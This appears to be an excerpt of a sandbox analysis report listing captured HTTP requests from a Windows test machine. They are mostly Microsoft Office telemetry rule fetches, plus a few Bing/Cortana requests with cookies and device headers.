Source: global traffic HTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /manifest/threshold.appcache HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initorigin: https://www.bing.comaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307; SRCHHPGUSR=IPMH=402439e4&IPMID=1741339336144&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
Source: global traffic HTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Init HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307; SRCHHPGUSR=IPMH=c1a41935&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
Source: global traffic HTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=k&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=1&cvid=1c3f91108ddc400280290f3dcf1c3f62&ig=c16bccd06c08419ab579eb9d479800f7 HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-s
Source: global traffic HTTP traffic detected: GET /PPRelatedSearch?query=Classic_%7B725be8f7-668e-4c7b-8f90-46bdb0936430%7D&lang=en-CH HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-search-safesearch: Moderatex-search-timezone: Bias=-60; StandardBias=0; TimeZoneKeyName=W. Europe Standard 